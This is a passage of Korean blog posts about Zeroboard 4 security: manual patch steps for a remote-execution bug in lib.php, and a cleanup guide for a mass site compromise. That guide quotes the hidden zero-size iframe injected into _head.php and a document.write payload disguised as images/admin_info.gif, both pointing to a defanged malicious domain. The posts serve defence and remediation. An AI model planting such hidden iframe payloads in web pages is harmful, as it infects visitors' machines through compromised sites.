다른 사람의 글을 마구 본다면 곤란한데 말입니다.

'Digital Life' 카테고리의 다른 글

신촌 탐앤탐스 단점  (2) 2008.10.22
많이 늘었구나..  (0) 2008.10.07
3년 전 자료를 찾았습니다.  (0) 2008.08.17
전자기기는 재부팅이 필수!  (0) 2008.08.09
인코딩은 어렵네  (0) 2008.08.01
Posted by Parker Falcon

결국 패치가 나왔습니다.

우선 문제는 lib.php파일에 있었나봅니다.

제로보드4 원격실행 취약 버그 패치해주세요. 제로보드 4.1 pl8 - 2007. 11. 1일 보안 버그까지 적용

수동 해결 방안도 함께 이렇게 제시하고 있습니다.

  1. lib.php 파일을 에디터 등으로 연다
  2. $REMOTE_ADDR 이라는 글자를 모두 $_SERVER['REMOTE_ADDR'] 로 변경
  3. 이 때 global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이라는 부분에서는
    global $HTTP_SESSION_VARS, $member_table, $member, $connect; 로 변경을 한다.

하지만 편집 프로그램의 찾아 바꾸기 기능으로 마구 바꾸시면 곤란하구요.

혹시 php의 문법을 (아니라 C의 문법이라도 ) 아시는 분이시라면

lib.php에서 REMOTE_ADDR을 찾아보면


두종류가 있습니다.

하나는 선언 부분인데

global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect;
global $HTTP_SESSION_VARS, $member_table, $member, $connect;

이렇게 선언문, 그러니까 앞에 global이 있는 문장에서는

$REMOTE_ADDR 은 삭제하시고,

$zb_logged_ip=$REMOTE_ADDR;
$zb_logged_ip=$_SERVER['REMOTE_ADDR'];

이렇게 실제로 쓰이는 부분에서는, 그러니까 앞에 global이 없을 때는

$REMOTE_ADDR 을 $_SERVER['REMOTE_ADDR']로 바꾸시면 됩니다.

Posted by Parker Falcon

요즘 제로보드4에 대한 중국발 해킹이 늘어나면서
많은 홈페이지가 감염되고, 또한 사용자들도 감염되고 있습니다.


당장의 대책이라면 _head.php에

<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>
이것을 제거하시구요.
그리고 images폴더 아래에 admin_info.gif파일이 있는데
이것도 제거하십시요.
파일 내용은
images/admin_info.gif

document.write("<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>");

이러합니다.


그리고 이런 작업은 홈페이지 관리자만 할 수 있습니다.

관리자가 할 수 있는 것은 제로보드의 최신 패치를 업데이트 하는 것 입니다.

제가 본 사이트 대부분이 2006년 3월 15일자 패치만을 해 둔 상태인데

http://www.zeroboard.com/zb4_download/803874

로 가셔서 2007년 5월 23일짜 보안 패치까지 된 pl8버전을 받으시기 바랍니다.
제로보드에서 업데이트 중에 pl의 숫자를 올리지 않아서
많은 사람들이 업데이트가 없다고 생각한 것인지는 모르겠지만
아무튼 많은 분들께서 더이상의 업데이트를 하지 않으셨습니다.

그리고 일반 사용자분들 께서 하실 수 있는 일은

인터넷 익스플로어를 사용하신다면

도구 - 인터넷 옵션 - 보안 으로 가셔서

제한된 사이트 클릭하시고 목록에 *.xin8.info 를 입력하고 추가하시기 바랍니다.

다른 브라우져 (Firefox, Opera, Safari)를 사용 하시는 분들은 상관 없지만

인터넷 익스플로어 엔진을 사용하는 브라우져를 사용하시는 분들은 똑같이 추가하시기 바랍니다.

아무튼 다들 피해 없으시기 바랍니다 :)

Posted by Parker Falcon